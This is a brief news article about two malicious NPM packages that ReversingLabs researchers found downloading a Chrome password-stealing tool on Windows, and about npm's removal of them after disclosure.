Code published to Node Package Manager (NPM) has been caught stealing passwords from legitimate account recovery tools in Chrome on Windows. That’s based on recent reports, detailing the malicious code, which was found in two packages in the NPM repository.
The issue in question stems from the discovery of an embedded Windows .exe file found in two packages. Specifically, “Win32.Infostealer.Heuristics” — which was discovered by ReversingLabs researchers in “nodejs_net_server” and “temptesttempfile.”
What was going on with this?
Now, digging deeper into this issue, nodejs_net_server is a package with 12 published versions and more than 1,300 downloads since early 2019. The most recent update was six months ago, with authorship attributed to “chrunlee” — a name which also appears in GitHub. It wasn’t until that point, in December 2020, via a version 1.1.0 update that a script was added to download the above-mentioned password-stealing tool.
The second of the packages, “temptesttempfile” is more mysterious. It doesn’t appear to have done much of anything, as of this writing. Aside from containing the same remote shell functionality that was found in the other versions of the nodjs_net_server package. But, in this case, those don’t actually appear to have done anything. Or, at the very least, they didn’t execute the password hijacking tool.
The passwords-stealing tool itself, however, was found to be in use in the Google ChromePass Utility for Windows Chrome, published by NirSoft. That utility is summarily used to retrieve and view passwords stored in Google’s Chrome browser.
Are you safe from password stealing account recovery tools in Windows Chrome now?
Now, initially, Reversing Labs reached out to the npm security team on July 2 about the problem presented by the packages in question. It appears as though that prompted npm, Inc. to launch its own investigation. And, following that investigation, the company has removed both malicious packages from its repository. Although, the company was reportedly forced to reach out to npm again on July 15 since it was still live in the repository at that time.